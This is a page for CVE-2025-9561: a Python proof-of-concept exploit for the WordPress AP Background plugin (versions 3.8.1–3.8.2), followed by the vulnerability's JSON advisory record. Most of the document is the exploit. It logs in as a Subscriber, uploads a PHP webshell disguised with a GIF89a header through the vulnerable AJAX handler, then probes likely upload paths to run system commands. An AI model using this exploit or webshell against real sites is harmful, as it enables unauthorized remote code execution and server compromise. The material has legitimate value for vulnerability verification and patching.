CVE-2025-9561

# CVE-2025-9561 - WordPress AP Background Plugin Arbitrary File Upload PoC # Vulnerability: Missing authorization + Insufficient file validation in advParallaxBackAdminSaveSlider() # Affected versions: 3.8.1 - 3.8.2 import requests import re TARGET_URL = "http://target-wordpress-site.com" USERNAME = "subscriber_user" PASSWORD = "subscriber_password" # Step 1: Login as Subscriber-level user session = requests.Session() # Get login page to retrieve nonce/token login_page = session.get(f"{TARGET_URL}/wp-login.php") # Perform login login_data = { "log": USERNAME, "pwd": PASSWORD, "wp-submit": "Log In", "redirect_to": f"{TARGET_URL}/wp-admin/", "testcookie": "1" } response = session.post(f"{TARGET_URL}/wp-login.php", data=login_data) # Verify login success if "wp-admin" in response.url or "dashboard" in response.text.lower(): print("[+] Successfully logged in as Subscriber") else: print("[-] Login failed") exit(1) # Step 2: Prepare malicious PHP webshell disguised as image # PHP payload - minimal webshell php_payload = b"<?php if(isset($_GET['cmd'])){system($_GET['cmd']);} ?>" # GIF89a header to bypass MIME type checks gif_header = b"GIF89a" malicious_file = gif_header + php_payload # Step 3: Upload malicious file via vulnerable advParallaxBackAdminSaveSlider handler # The handler is typically triggered via WordPress admin-ajax.php files = { "slider_image": ("shell.php", malicious_file, "image/gif") } data = { "action": "advParallaxBackAdminSaveSlider", # Vulnerable AJAX action "slider_title": "exploit_slider" } # Send the exploit request upload_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" response = session.post(upload_url, files=files, data=data) print(f"[+] Upload response: {response.text}") # Step 4: Try to locate uploaded file and execute command # Common upload paths in AP Background plugin upload_paths = [ "/wp-content/uploads/ap-background/sliders/shell.php", "/wp-content/uploads/shell.php", "/wp-content/plugins/ap-background/uploads/shell.php" ] for path in upload_paths: rce_url = f"{TARGET_URL}{path}?cmd=id" rce_response = session.get(rce_url) if rce_response.status_code == 200 and "uid=" in rce_response.text: print(f"[+] RCE confirmed at: {rce_url}") print(f"[+] Output: {rce_response.text}") break else: print(f"[-] Tried {path} - checking response")

{"cve": {"id": "CVE-2025-9561", "sourceIdentifier": "[email protected]", "published": "2025-10-03T12:15:48.477", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The AP Background plugin for WordPress is vulnerable to arbitrary file uploads due to missing authorization and insufficient file validation within the advParallaxBackAdminSaveSlider() handler in versions 3.8.1 to 3.8.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/ap-background/tags/3.8.2/includes/functions.admin.php", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/ap-background/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e4045a2b-2bbc-4335-b6d2-af7a046f1f92?source=cve", "source": "[email protected]"}]}}